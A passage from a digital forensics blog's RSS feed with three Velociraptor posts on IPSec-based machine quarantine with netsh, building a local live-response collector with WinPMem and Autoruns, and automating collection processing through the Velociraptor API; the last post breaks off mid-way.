&lt;p&gt;To create a policy: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static add policy name=&amp;lt;string&amp;gt; description=&amp;lt;string&amp;gt;&lt;/code&gt;&lt;br /&gt;
To enable a policy:&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static set policy name=&amp;lt;string&amp;gt; assign=[y|n]&lt;/code&gt;&lt;br /&gt;
To delete a policy: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static delete policy name=&amp;lt;string&amp;gt;&lt;/code&gt;&lt;br /&gt;
NOTE: when deleting a policy it is disabled and all policy objects are also deleted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Filter List&lt;/strong&gt; - Is simply a named container for one or more filters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Filter&lt;/strong&gt; - Filters determine when to activate IPSec Rules.&lt;/p&gt;

&lt;p&gt;To create a filter:&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static add filter filterlist=&amp;lt;string&amp;gt;&lt;/code&gt;  &lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;srcaddr=[me|any|&amp;lt;dns&amp;gt;|&amp;lt;server&amp;gt;|&amp;lt;ipv4&amp;gt;|&amp;lt;ipv6&amp;gt;|&amp;lt;ipv4-ipv4&amp;gt;|&amp;lt;ipv6-ipv6&amp;gt;]&lt;/code&gt; - source address.&lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;srcmask=[&amp;lt;mask&amp;gt;|&amp;lt;prefix&amp;gt;]&lt;/code&gt; - source netmask, only needed if network IP specified.  &lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;srcport=[&amp;lt;port&amp;gt;]&lt;/code&gt; - source port as integer. 0 for all.&lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dstaddr=[me|any|&amp;lt;dns&amp;gt;|&amp;lt;server&amp;gt;|&amp;lt;ipv4&amp;gt;|&amp;lt;ipv6&amp;gt;|&amp;lt;ipv4-ipv4&amp;gt;|&amp;lt;ipv6-ipv6&amp;gt;]&lt;/code&gt; - destination. 
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dstmask=[&amp;lt;mask&amp;gt;|&amp;lt;prefix&amp;gt;]&lt;/code&gt; - destination netmask, only needed if network IP specified.&lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dstport=[&amp;lt;port&amp;gt;]&lt;/code&gt; - destination port as integer. 0 for all.&lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;protocol=[ANY|ICMP|TCP|UDP|RAW|&amp;lt;integer&amp;gt;]&lt;/code&gt; - protocol as name or port.  &lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mirrored=[&amp;lt;yes&amp;gt;|&amp;lt;no&amp;gt;]&lt;/code&gt;  - optional and defaults to yes as it enables reverse communication.
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;description=[&amp;lt;string&amp;gt;]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;For example: Allowing RDP traffic inbound to a machine from any IP&lt;br /&gt;
(Example only - stay away from this rule in an IR)  &lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static add filter filterlist=&quot;Test Filter List&quot;&lt;/code&gt;&lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;srcaddr=me srcport=3389 dstaddr=any dstport=0 protocol=tcp&lt;/code&gt;  &lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;description=&quot;quick and dirty RDP filter&quot;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Filter Action&lt;/strong&gt; - Occurs when a Filter is satisfied. An IPSec filter can be permit, block, encrypt or sign the data stream. In my use case, I am only interested in permit and block as we are not interested in traffic encryption or validation usecases.&lt;/p&gt;

&lt;p&gt;To create a filter action:&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static add filteraction name=&amp;lt;string&amp;gt; action=&amp;lt;permit&amp;gt;|&amp;lt;block&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rules&lt;/strong&gt; - An IPSec rule requries a filter list and a filter action and connects them to a policy. An optional component of a rule is authentication, which is out of scope for my current implementation.&lt;/p&gt;

&lt;p&gt;To create a rule:&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netsh ipsec static add rule name=&amp;lt;string&amp;gt; policy=&amp;lt;string&amp;gt;&lt;/code&gt;&lt;br /&gt;
    &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;filterlist=&amp;lt;string&amp;gt; filteraction=&amp;lt;string&amp;gt; description=&amp;lt;string&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h3 id=&quot;rolling-into-velociraptor&quot;&gt;Rolling into Velociraptor&lt;/h3&gt;
&lt;p&gt;The summary of the above commands translate into a defined process:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Create policy.&lt;/li&gt;
  &lt;li&gt;Create filter lists.&lt;/li&gt;
  &lt;li&gt;Add filters to filter lists.&lt;/li&gt;
  &lt;li&gt;Create filter actions.&lt;/li&gt;
  &lt;li&gt;Create rules (link all together).&lt;/li&gt;
  &lt;li&gt;Apply policy.&lt;/li&gt;
  &lt;li&gt;Test it works.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Velociraptor implementation of this process is transparent apart from a few select components. The goals being a repeatable capability that is reliable.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2020-07-23-IPSEC/01parameters.png&quot; /&gt;&lt;br /&gt;Quarantine: Parameter options&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Configurable items are:&lt;br /&gt;
&lt;strong&gt;PolicyName&lt;/strong&gt; - for auditing purposes&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RuleLookUpTable&lt;/strong&gt;&lt;br /&gt;
This enables custom IPSec filters to be added to the permit or block rule configuration easily. Each field corresponds to a Netsh switch discussed above and the only requirements are action, source and destination addresses. All other items will simply add the entry to the relevant switch in netsh and bad commands will be observed in results.&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2020-07-23-IPSEC/02log.png&quot; /&gt;&lt;br /&gt;Artifact log: executed netsh commands.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;The commands in my screenshots resulted from adding to the artifact defaults:&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2020-07-23-IPSEC/02error.png&quot; /&gt;&lt;br /&gt;Custom filters: RDP and force error&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;700&quot; src=&quot;/static/img/article_images/2020-07-23-IPSEC/02results.png&quot; /&gt;&lt;br /&gt;Artifact results: see netsh stderr on incorrect entry.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MessageBox&lt;/strong&gt; - if configured will show a messagebox to all logged in users. There is a limitation of 256 Characters that will be trucated if exceeded.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2020-07-23-IPSEC/02messagebox.png&quot; /&gt;&lt;br /&gt;Example messagebox&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RemovePolicy&lt;/strong&gt; - will simply run the remove policy command for configured policy name.&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;h3 id=&quot;caveats&quot;&gt;Caveats&lt;/h3&gt;
&lt;p&gt;There are a couple of considerations when deploying local IPSec policy.&lt;/p&gt;

&lt;p&gt;First being, it is dangerous to apply local policy and there is a real risk of locking yourself out of access to the machine. DNS resolutions can change, DHCP leases expire or the block all approach may accidentally block an unintended resource. Understanding the network and entering appropriate exclusions to mitigate these issues are important. In addition to exclusions, it is reccomended to test content prior to live fire.&lt;/p&gt;

&lt;p&gt;To simplify this process, I have implemented a capability to extract the agent config and add the Velociraptor server configuration automatically to exclusions. After policy deployment, the machine will attempt communication back to the Velociraptor server and if it fails, roll back the quarantine policy. Similarly all DNS and DHCP traffic is allowed by default in user customisable configuration.&lt;/p&gt;

&lt;p&gt;The final caveat is local IPSec policy can not be applied if a domain level IPSec policy is applied. In this case the reccomendation is to add a seperate quarantine rule via Active Directory.&lt;/p&gt;

&lt;h3 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h3&gt;
&lt;p&gt;In this post I have walked through local IPSec policy to implement machine quarantine in the Velociraptor platform. Despite limitations, this feature has been useful for me to call on as needed. Testing and the age old “understanding your tools” is very important.&lt;/p&gt;

&lt;p&gt;I already have several optimisations planned - feel free to send through any other thoughts, feedback and optimisations.&lt;/p&gt;

&lt;p&gt;Content can be found - &lt;a href=&quot;https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Remediation/Quarantine.yaml&quot;&gt;Windows.Remediation.Quarantine&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;further-resources&quot;&gt;Further resources&lt;/h1&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh&quot;&gt;Microsoft Docs, Network Shell (Netsh).&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://docs.microsoft.com/en-us/powershell/module/netsecurity/new-netipsecrule?view=win10-ps&quot;&gt;Microsoft Docs, New-NetIPsecRule.&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc754274(v=ws.11)?redirectedfrom=MSDN&quot;&gt;Microsoft Docs, Windows Firewall with Advanced Security.&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://channel9.msdn.com/Events/Ignite/New-Zealand-2016/M377&quot;&gt;Payne, Jessica. Demystifying the Windows Firewall, Ignite 2016&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://blog.dane.io/2018/04/22/endpoint-isolation-with-the-windows-firewall.html&quot;&gt;Stuckey, Dane. Endpoint Isolation with the Windows Firewall, 2018&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

</description>
        <pubDate>Thu, 23 Jul 2020 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2020/07/23/IPSEC.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2020/07/23/IPSEC.html</guid>
        
        <category>DFIR</category>
        
        <category>Velociraptor</category>
        
        <category>VQL</category>
        
        <category>NetSh</category>
        
        <category>IPSec</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Local Live Response with Velociraptor ++</title>
        <description>&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;200&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/00title.png&quot; /&gt;&lt;/div&gt;
&lt;p&gt;In this post im going to talk about a live response use case leveraging the Velociraptor project worth sharing. Specifically, live response with ancillary collection by third party tools embedded to minimise user impact. As usual, im going to provide some background and walk through the steps then share the code.&lt;/p&gt;

&lt;p&gt;EDIT: Please use this post for education only. Although the content and themes of this post are valid, the examples included have been superseeded by a GUI based local collector builder from the Velociraptor server.
&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;background&quot;&gt;Background&lt;/h4&gt;
&lt;p&gt;Live response collection is one of the most critical stages of modern incident response. A quick targeted collection of important artefacts means timely answers and more efficient results. Although I prefer a remote agent keeping the human element out of collection as much as possible, a common use case I encounter is needing to run a local collection from a USB or network share. Typically this means providing a script of some sort with a binaries folder and collection protocol, sometimes to less technical users with a margin for error.&lt;/p&gt;

&lt;p&gt;Mike at Velocidex has posted recently about triage collection (local live response) with Velociraptor:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://medium.com/velociraptor-ir/triage-with-velociraptor-pt-1-253f57ce96c0&quot;&gt;Triage with Velociraptor — Pt 1&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://medium.com/velociraptor-ir/triage-with-velociraptor-pt-2-d0f79066ca0e&quot;&gt;Triage with Velociraptor — Pt 2&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://medium.com/velociraptor-ir/triage-with-velociraptor-pt-3-d6f63215f579&quot;&gt;Triage with Velociraptor — Pt 3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One undocumented feature is Velociraptor’s ability to append additional tools to the end of the binary and enable execution. This capability opens up some really nice use cases for ancillary data collection during a local Velociraptor triage. Im going to cover creating a Velicraptor local live binary with WinPMem for memory and Autoruns for autostart extensibility point (ASEP) collection.&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;what-do-i-need&quot;&gt;What do I need?&lt;/h4&gt;
&lt;p&gt;I will be using the current Velociraptor release and building on a linux platform. Im looking at building both a x64 and x86 Windows version, so I want to download the relevant Velociraptor binaries to my staging folder.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/01Latest.png&quot; /&gt;&lt;br /&gt;Download Velociraptor binaries&lt;/div&gt;

&lt;p&gt;We will also download both x86 and x64 third party binaries supporting my use cases. In this instance Autoruns and WinPMem, which I then add to the relevant “bitness” payload zip files.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/01Other.png&quot; /&gt;&lt;br /&gt;payload.zip: x64 binaries, payload_x86.zip: x86 binaries&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;velociraptor-configuration&quot;&gt;Velociraptor configuration&lt;/h4&gt;
&lt;p&gt;Setting up for local live response requires setting up an autoexecution object and output configuration. In my case, I setup artifact called “MultiCollection” with a zipfile output “collection_HOSTNAME.zip”. As there is no folder path specified, the zip will end up in the “start in folder”.&lt;/p&gt;

&lt;p&gt;Once the structure of VQL is understood it is trivial to add in additional use cases. Under the parameters section, I also have included an “uploadTable” parameter to add additional direct file downloads not covered by other components. In this case, im adding pagefile, swapfile and hybernation files if they exist as default. This table is helpful for quick collection and can also be represented in a glob style search.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/02Config.png&quot; /&gt;&lt;br /&gt;Autoexecution VQL object&lt;/div&gt;

&lt;p&gt;Next component is the “sources” section which outlines the VQL queries to run. In my screenshot below, supporting order of volatility, I am running memory collection first then supporting file uploads. Worthy to note: my VQL does not “upload” to the output zip file, instead I have decided to output to “HOSTNAME.aff4” to the same folder as the binary to optimise resouce use and remove the need to push the aff4 to a temporary location prior to adding to the zip.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;550&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/02Config2.png&quot; /&gt;&lt;br /&gt;Memory acquisition&lt;/div&gt;

&lt;p&gt;Velociraptor allows modular use of the collection profiles from Eric Zimmerman’s KapeFiles project. I have chosen KapeFiles.Targets _BasicCollection and some supporting items is my next VQL sources. I have also included a version of &lt;a href=&quot;https://gist.github.com/mgreen27/22cd70739e733647e1e23338ca35c9a9#file-local_all-yaml&quot;&gt;all currently available switches&lt;/a&gt; (at time of writing), to use as a template and remove unwanted items prior to build.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;550&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/02Config3.png&quot; /&gt;&lt;br /&gt;KapeFiles acquisition&lt;/div&gt;

&lt;p&gt;Finally, I am collecting an Autoruns output for autostart extensibility point (ASEP) collection. In my VQL I have specifically used wildcards to cover both x86 and x64 binaries and enable use of the same configuration across bitness. I am also using the same trick as my WinPMem execution and output to the binary root folder as “HOSTNAME_autoruns.csv”&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/02Config4.png&quot; /&gt;&lt;br /&gt;Autoruns aquisition&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;how-do-i-build-it&quot;&gt;How do I build it?&lt;/h4&gt;
&lt;p&gt;To build we run velociraptor in “repack” mode. That is specifying: the input binary, relevant payload zip, configuration file and output binary.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/03Build.png&quot; /&gt;&lt;br /&gt;Velociraptor repack&lt;/div&gt;

&lt;p&gt;One thing to note, is that using this technique the created binary will not contain a valid certificate as the binary is modified with the “repack” command. This condition occurs through any of the Velociraptor customisations and typically is not a problem during live response.&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;how-do-i-run-it&quot;&gt;How do I run it?&lt;/h4&gt;
&lt;p&gt;Copy the relevant binaries to your collection USB, folder or share and execute with administrator privilege.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/04Run.png&quot; /&gt;&lt;br /&gt;...SNIP...&lt;/div&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/04Run2.png&quot; /&gt;&lt;br /&gt;Local live response execution&lt;/div&gt;

&lt;p&gt;Output will be to the binary folder.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/04Run3.png&quot; /&gt;&lt;br /&gt;Live response output&lt;/div&gt;

&lt;p&gt;Opening collection_HOSTNAME.zip we can see all files that were configured for collection / upload.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-12-08-LocalLRwithVRaptor/04Run4.png&quot; /&gt;&lt;br /&gt;collection zip contents&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h4&gt;
&lt;p&gt;In this post I have walked through using Velociraptor to wrap third party binaries into an easy to use local live response tool. Velociraptor’s modular architecture enables rolling in and out capabilities fast for a simple end user experience.&lt;/p&gt;

&lt;p&gt;For those that are interested I have included below:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;&lt;a href=&quot;https://gist.github.com/mgreen27/22cd70739e733647e1e23338ca35c9a9#file-buildlocallr-sh&quot;&gt;A build script for building x86 and x64 versions of my local live response tool&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://gist.github.com/mgreen27/22cd70739e733647e1e23338ca35c9a9#file-local_all-yaml&quot;&gt;A configuration file with ALL KapeFiles switches&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://gist.github.com/mgreen27/22cd70739e733647e1e23338ca35c9a9#file-local-yaml&quot;&gt;The reduced configuration from my example&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I hope you have gained some knowledge on Velociraptor for local live response. Please feel free to reach out and provide feedback or improvements.&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;further-resources&quot;&gt;Further resources&lt;/h4&gt;
&lt;ol&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.velocidex.com/about/&quot;&gt;Velociraptor Documentation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://medium.com/velociraptor-ir/triage-with-velociraptor-pt-1-253f57ce96c0&quot;&gt;Triage with Velociraptor — Pt 1&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://medium.com/velociraptor-ir/triage-with-velociraptor-pt-2-d0f79066ca0e&quot;&gt;Triage with Velociraptor — Pt 2&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://medium.com/velociraptor-ir/triage-with-velociraptor-pt-3-d6f63215f579&quot;&gt;Triage with Velociraptor — Pt 3&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
</description>
        <pubDate>Sun, 08 Dec 2019 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2019/12/08/LocalLRwithVRaptor.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2019/12/08/LocalLRwithVRaptor.html</guid>
        
        <category>DFIR</category>
        
        <category>Velociraptor</category>
        
        <category>VQL</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Live response automation with Velociraptor</title>
        <description>&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/00title.png&quot; /&gt;&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;This post is going to talk about the Velociraptor project. Specifically, live response and automation I have built for my own engagements. Im going to provide some background and walk through a proof of concept, then share the code.&lt;/p&gt;

&lt;p&gt;EDIT: Please use this post for historical education only. Although the content and themes of this post are valid, the examples included are no longer valid for the current Velociraptor version. For current API configuration, please refer to the following links or feel free to contact me directly.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.velocidex.com/discord&quot;&gt;Chat with us on Discord&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.velocidex.com/docs/user-interface/api/&quot;&gt;Documentation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.velocidex.com/blog/medium/2020-03-06-velociraptor-post-processing-with-jupyter-notebook-and-pandas-8a344d05ee8c/&quot;&gt;Blog Post&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;background&quot;&gt;Background&lt;/h3&gt;
&lt;p&gt;Velociraptor is an endpoint collection tool developed by Michel Cohen at Velocidex. Mike was the lead developer on many open source tools we know pretty well in our industry: for example Rekall/WinPMem, AFF4 and GRR. Velociraptor was created to simplify the GRR architecture and some of the complexity poblems of clunky back end and bloated data models. The result is a robust query language (VQL) and open source collection framework that is the building blocks of greatness.&lt;/p&gt;

&lt;p&gt;The ability to collect and process data efficiently as part of live response workflow is critial for timely incident response. This is all made possible by Velociraptor, and its open ended API enables interoperability with other tools, speeding up this process.&lt;/p&gt;

&lt;p&gt;Basic setup of Velociraptor is out of scope for this post. I am running Velociraptor on hardened linux platform and plan to walk through setting up a live response processing service. For setup background, I have added a lot of great resources in the references section below.  Although not required, this post assumes some familiarity with Velociraptor and it is reccomended to review some of the references if not familiar with the platform.&lt;/p&gt;

&lt;h3 id=&quot;api-basics&quot;&gt;API Basics&lt;/h3&gt;
&lt;p&gt;The Velociraptor API is fairly simple architecture and enables VQL queries with an output of familiar VQL result rows. The power to this approach is those rows can then be enriched and processed to enable completx workflows.  It can be invoked both locally or over the network, providing the building blocks we desire in mature incident response.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/01APIServices.png&quot; /&gt;&lt;br /&gt;Velociraptor Services Architecture&lt;/div&gt;

&lt;p&gt;The modularity means post processing work is not part of the Velociraptor front end. We are able to essentially watch an event queue, then execute our API based use cases as desired. Performance can be optimised as with an accessable file system, intensive tasks like Live Response processing can be run on dedicated servers.&lt;/p&gt;

&lt;h3 id=&quot;api-setup&quot;&gt;API Setup&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/Velocidex/velociraptor/tree/master/bindings/python&quot;&gt;Python bindings&lt;/a&gt; are included in the project a long with a &lt;a href=&quot;https://github.com/Velocidex/velociraptor/blob/master/bindings/python/client_example.py&quot;&gt;working client example&lt;/a&gt;. The velocidex team also have a great amount of API connection information on the documentation page. This ensures connection and content development are simple and we can focus on the content.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/02APIinstall.png&quot; /&gt;&lt;br /&gt;Velociraptor Python bindings install commands&lt;/div&gt;

&lt;p&gt;An API configuration file is also required for authentication and key materials are generated similar to other Velociraptor configuration items.&lt;br /&gt;
        &lt;em&gt;velociraptor –config server.config.yaml config api_client –name [APIName] &amp;gt; api_client.yaml&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;api_client.yaml:&lt;br /&gt;
        &lt;em&gt;&amp;lt;SNIP Certificate information&amp;gt;&lt;/em&gt;&lt;br /&gt;
        &lt;em&gt;api_connection_string: 127.0.0.1:8001&lt;/em&gt;&lt;br /&gt;
        &lt;em&gt;name: [APIName]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Note: default server.config.yaml configures the API service to bind to all interfaces and listen on port 8001. Please ensure relevant bindings and ports availible.&lt;/p&gt;

&lt;p&gt;The example client script contains a great example of setting up API connection and a query stub. I have chosen to modify the script and add some global variables to simplify execution.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;450&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/03APIQuery.png&quot; /&gt;&lt;br /&gt;Example API python global variables&lt;/div&gt;

&lt;p&gt;CONFIG is my generated client API configuration path. I have chosen the default velociraptor config path but this can be any location.&lt;/p&gt;

&lt;p&gt;CASES is my output folder path. This can be an ingestion path or distributed storage to plug processed data into additional workflow.&lt;/p&gt;

&lt;p&gt;QUERY is my VQL I plan to query through the API. The query monitors the Velociraptor server for completed flow events; i.e &lt;em&gt;watch_monitoring(artifact=’System.Flow.Completion’)&lt;/em&gt;. A WHERE clause extracts Flows containing artefacts with results and names containing  “KapeFiles” or “LiveResponse”.&lt;/p&gt;

&lt;p&gt;What makes VQL so powerful is we can enrich with additional VQL or formatting. In my example, the SELECT statement extracts relevant fields pertaining to a completed flow for my processing use cases. This includes a list of uploaded files, their path and other flow metadata.&lt;/p&gt;

&lt;h3 id=&quot;api-processing&quot;&gt;API Processing&lt;/h3&gt;
&lt;p&gt;Now we have collected data points requried for processing, its as simple as running our normal processing logic applied to each row of results.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/04Process.png&quot; /&gt;&lt;br /&gt;Extraction and printing of Flow results&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;300&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/04ProcessStdOut.png&quot; /&gt;&lt;br /&gt;StdOut: Flow results&lt;/div&gt;

&lt;p&gt;After setting up relevant variables for processing, we can then shuttle off to tasks. Below is my plaso based timeliner function for a quick and dirty timeline.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/05TimelinerFlow.png&quot; /&gt;&lt;br /&gt;Calling timeliner&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/05Timeliner.png&quot; /&gt;&lt;br /&gt;Timeliner: plaso based timeline function&lt;/div&gt;

&lt;p&gt;The function sets up relevant paths for the command, creates target folder and shells out to the relevant plaso script. Modification is simple and the results can be collected manually or by data platform agent of choice.&lt;/p&gt;

&lt;p&gt;Similarly, file specific processing based on upload_paths enables traversing the flow upload paths once for optimal performance. I have also included a test and will only process some paths if the artifact of interest was collected.&lt;/p&gt;

